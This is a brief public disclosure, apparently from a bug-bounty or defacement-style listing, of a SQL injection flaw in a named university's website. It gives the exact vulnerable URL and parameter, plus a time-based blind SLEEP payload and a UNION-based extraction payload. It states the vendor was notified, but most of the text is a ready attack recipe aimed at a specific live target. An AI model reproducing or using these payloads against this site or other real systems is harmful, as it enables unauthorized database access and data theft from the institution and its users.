www.hu.edu.pk – SQL Vulnerability

Hazara University

Website: www.hu.edu.pk/oldwebsitehu/webtest/view_deg_prog.php?id=1

Vuln type: SQL Injection

Submitted by: Waqas Haider

POC:

Vuln-Parameter: id (GET)

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind

Payload: id=1 AND SLEEP(5)

Type: UNION query

Title: Generic UNION query (NULL) - 4 columns

Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x7178706b71,0x796a6a65696172416b5a596250664269416a636a474d6a484e57674f76455052517452796d744c74,0x71706b6a71),NULL,NULL-- FAic

Notification: Vendor Notified
